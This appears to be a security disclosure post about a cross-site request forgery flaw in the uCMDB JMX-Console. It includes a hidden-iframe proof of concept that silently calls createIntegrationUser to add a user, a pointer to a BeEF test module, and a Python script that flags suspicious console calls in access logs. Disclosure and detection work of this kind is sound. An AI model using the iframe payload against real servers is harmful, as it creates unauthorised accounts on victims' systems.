The product ships with a JMX-Console that exposes direct access to its Managed Beans (MBeans). This JMX-Console, a standard part of every uCMDB installation, is vulnerable to Cross-Site Request Forgery (CSRF). I reported this because additional users, including integration users, can be created through the JMX-Console, and a lot of other functionality is reachable through it as well.
After sending them eight e-mails, with references to their deployment guides and release notes, they still ignore the problem; their conclusion is that it is due to the installation of a JBoss server on the uCMDB system. I have no other choice than to warn uCMDB system administrators.
PoC
You can easily verify it with a hidden iframe; when the page is loaded by a browser that holds a valid JMX-Console session, the request below invokes createIntegrationUser on the Security Services MBean without any further interaction:
<iframe src="http://ucmdbhostname:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=createIntegrationUser&arg0=1&arg1=testaa&arg2=testbb&arg3="
width="0" height="0" ></iframe>
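The iframe works because HtmlAdaptor accepts the operation invocation as a plain GET, the browser attaches whatever credential it already holds for ucmdbhostname (session cookie or cached Basic-auth credentials), and the request carries no anti-CSRF token, so any page the administrator happens to visit can issue it. Administrators who want to know whether this has already been used against them can look for it in the web server's access log. The script below is an added example, not code from the original post or from the uCMDB product: it parses constructed access-log lines in combined log format and flags state-changing HtmlAdaptor actions (invokeOp, invokeOpByName, updateAttributes) whose Referer is missing or points to a host other than the uCMDB server. The log lines, the host name ucmdbhostname and the sample user names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/Tomcat "combined" access-log format.
# They are made up for this example and are not real uCMDB logs.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2013:10:01:02 +0100] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=UCMDB%3Aservice%3DSecurity%20Services HTTP/1.1" 200 5120 "http://ucmdbhostname:8080/jmx-console/" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2013:10:03:44 +0100] "GET /jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=createIntegrationUser&arg0=1&arg1=testaa&arg2=testbb&arg3= HTTP/1.1" 200 812 "http://evil.example/blog.html" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2013:10:05:10 +0100] "GET /jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=createIntegrationUser&arg0=1&arg1=backdoor&arg2=secret&arg3= HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2013:10:07:00 +0100] "GET /jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=createIntegrationUser&arg0=1&arg1=ops&arg2=pw&arg3= HTTP/1.1" 200 812 "http://ucmdbhostname:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=UCMDB%3Aservice%3DSecurity%20Services" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

ADAPTOR_PATH = "/jmx-console/HtmlAdaptor"
# HtmlAdaptor actions that change state; inspectMBean/displayMBeans are read-only.
STATE_CHANGING_ACTIONS = {"invokeop", "invokeopbyname", "updateattributes"}


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def referer_host(referer):
    """Host part of the Referer header in lower case, or None when the header was absent ('-')."""
    if not referer or referer == "-":
        return None
    return (urlsplit(referer).hostname or "").lower() or None


def analyze(log_text, own_hosts):
    """Return findings for state-changing HtmlAdaptor calls whose Referer is missing or off-site.

    A missing Referer is treated as suspicious rather than benign, because an attacking page
    can suppress it (for example by embedding the iframe on an HTTPS page that targets the
    plain-HTTP console). Same-origin calls are skipped as normal console use.
    """
    own = {h.lower() for h in own_hosts}
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        if parts.path != ADAPTOR_PATH:
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)
        action = qs.get("action", [""])[0]
        if action.lower() not in STATE_CHANGING_ACTIONS:
            continue
        host = referer_host(rec["referer"])
        if host is None:
            reason = "missing Referer"
        elif host not in own:
            reason = f"off-site Referer {host}"
        else:
            continue
        # Collect arg0, arg1, ... in numeric order so the invoked parameters are readable.
        arg_keys = sorted((k for k in qs if re.fullmatch(r"arg\d+", k)), key=lambda k: int(k[3:]))
        findings.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "status": rec["status"],
            "action": action,
            "mbean": qs.get("name", [""])[0],
            "method_name": qs.get("methodName", [""])[0],
            "args": [qs[k][0] for k in arg_keys],
            "referer": rec["referer"],
            "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG, ["ucmdbhostname"]):
        print(f"{f['ts']} {f['ip']} {f['reason']}: {f['action']} {f['mbean']} "
              f"{f['method_name']}({', '.join(f['args'])}) -> {f['status']}")
```

Two of the four constructed lines are flagged: the invocation referred from evil.example and the one with no Referer at all; the read-only inspectMBean request and the same-origin invocation are ignored. The check only covers GET requests because the access log does not record POST bodies; a POST-based forgery of the same operation would need the request body or the console's own logging to be visible.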
BeEF Module
A module for testing this is available in the BeEF project.
Advice
Finally, my advice to uCMDB administrators is to be extra careful when using the JMX-Console. Make sure your session is expired or invalidated (log out) before accessing other web pages.
PS: I think uCMDB 10.x is also vulnerable...